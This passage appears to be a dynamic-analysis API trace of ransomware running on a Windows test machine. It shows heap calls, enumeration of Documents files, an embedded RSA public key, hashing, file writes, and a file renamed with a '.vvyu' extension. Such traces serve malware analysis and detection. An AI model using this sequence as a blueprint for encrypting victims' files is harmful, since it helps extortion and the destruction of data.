RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.475] GetCurrentThreadId () returned 0x264 [0184.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9a8 [0184.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e948 [0184.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e960 [0184.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e930 [0184.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9c0 [0184.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0184.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e990 [0184.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e978 [0184.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9d8 [0184.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e978 [0184.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e948 [0184.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31408 | out: hHeap=0x6a0000) returned 1 [0184.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.487] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x93cf, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x93cf, lpOverlapped=0x0) returned 1 [0184.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.488] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x93d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.489] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.490] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.491] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.491] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.491] CloseHandle (hObject=0x584) returned 1 [0184.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0184.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d41908 [0184.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0184.493] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\7q92iR26 9wIDTp.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\7q92ir26 9widtp.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\7q92iR26 9wIDTp.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\7q92ir26 9widtp.pptx.vvyu")) returned 1 [0184.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.495] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0184.498] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dd9800, ftCreationTime.dwHighDateTime=0x1d8a2b6, ftLastAccessTime.dwLowDateTime=0xf8a326e0, ftLastAccessTime.dwHighDateTime=0x1d8a415, ftLastWriteTime.dwLowDateTime=0xf8a326e0, ftLastWriteTime.dwHighDateTime=0x1d8a415, nFileSizeHigh=0x0, nFileSizeLow=0x14afe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a1p6lyHhe5fq5DudW9XM.rtf", cAlternateFileName="A1P6LY~1.RTF")) returned 1 [0184.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31408 [0184.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0184.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31408 | out: hHeap=0x6a0000) returned 1 [0184.498] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\a1p6lyHhe5fq5DudW9XM.rtf") returned=".rtf" [0184.498] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\a1p6lyHhe5fq5DudW9XM.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\a1p6lyhhe5fq5dudw9xm.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.500] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=84734) returned 1 [0184.500] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.502] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14ad8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.503] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.505] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.505] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x14afe, lpOverlapped=0x0) returned 1 [0184.506] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.506] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.506] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.506] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.507] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.507] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.507] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.507] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.507] GetLastError () returned 0x0 [0184.507] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.507] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.508] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.508] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.508] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14b00) returned 0x2d43778 [0184.508] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31408 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e918 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31450 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e930 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e960 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9c0 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e978 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.509] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9c0 [0184.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0184.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e978 [0184.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e960 [0184.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0184.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.510] 